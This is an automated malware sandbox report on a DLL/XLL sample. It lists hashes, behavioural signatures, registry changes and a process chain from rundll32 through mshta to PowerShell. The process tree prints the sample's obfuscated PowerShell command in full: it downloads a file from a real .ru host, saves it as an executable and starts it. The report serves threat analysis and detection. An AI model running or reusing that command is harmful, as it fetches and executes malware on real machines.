Analysis
-
max time kernel
16s -
max time network
151s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
08-07-2021 14:29
Static task
static1
Behavioral task
behavioral1
Sample
0708_5355150121.xll.dll
Resource
win7v20210410
Behavioral task
behavioral2
Sample
0708_5355150121.xll.dll
Resource
win10v20210408
General
-
Target
0708_5355150121.xll.dll
-
Size
23KB
-
MD5
41e0318dfdb1c180a375a7efc712649e
-
SHA1
f0c230010c7b85544c25879d4daf74479360e1bc
-
SHA256
73b8c566d8cdf3200daa0b698b9d32a49b1ea8284a1e6aa6408eb9c9daaacb71
-
SHA512
b20ec32ba9f7269deda4f70e655bb7a105dde896524bfd9c788605f2a0a26bc3bc7ddceed93c4f7b14404a65107647a9b9840c8adec32c12d92138b69805cc17
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
rundll32.exeflow pid process 10 1336 rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 416 3852 WerFault.exe mshta.exe -
Modifies registry class 1 IoCs
Processes:
rundll32.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings rundll32.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
WerFault.exepid process 416 WerFault.exe 416 WerFault.exe 416 WerFault.exe 416 WerFault.exe 416 WerFault.exe 416 WerFault.exe 416 WerFault.exe 416 WerFault.exe 416 WerFault.exe 416 WerFault.exe 416 WerFault.exe 416 WerFault.exe 416 WerFault.exe 416 WerFault.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 416 WerFault.exe Token: SeBackupPrivilege 416 WerFault.exe Token: SeDebugPrivilege 416 WerFault.exe -
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
rundll32.exerundll32.exemshta.exedescription pid process target process PID 808 wrote to memory of 1336 808 rundll32.exe rundll32.exe PID 808 wrote to memory of 1336 808 rundll32.exe rundll32.exe PID 808 wrote to memory of 1336 808 rundll32.exe rundll32.exe PID 1336 wrote to memory of 3852 1336 rundll32.exe mshta.exe PID 1336 wrote to memory of 3852 1336 rundll32.exe mshta.exe PID 1336 wrote to memory of 3852 1336 rundll32.exe mshta.exe PID 3852 wrote to memory of 184 3852 mshta.exe powershell.exe PID 3852 wrote to memory of 184 3852 mshta.exe powershell.exe PID 3852 wrote to memory of 184 3852 mshta.exe powershell.exe
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\0708_5355150121.xll.dll,#11⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\0708_5355150121.xll.dll,#12⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\res32.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3852 -s 13564⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe'4⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Public\res32.htaMD5
71999a9d2f15e164c9b1fa926aa6444b
SHA1c1fbd2b6458b474a208b6cc710951940c9290e5c
SHA256da92436d2bbcdef52b11ace6e2e063e9971cefc074d194550bd425305c97cdd5
SHA512298eaab6d157e81bb738b1605285a0d14b05ae3656f1bbf72c4921c78b74be7048b6744144469cb4ef48f4d4d233f794c366f192765a4f193c48b2de2eff4c27
-
memory/1336-114-0x0000000000000000-mapping.dmp
-
memory/3852-115-0x0000000000000000-mapping.dmp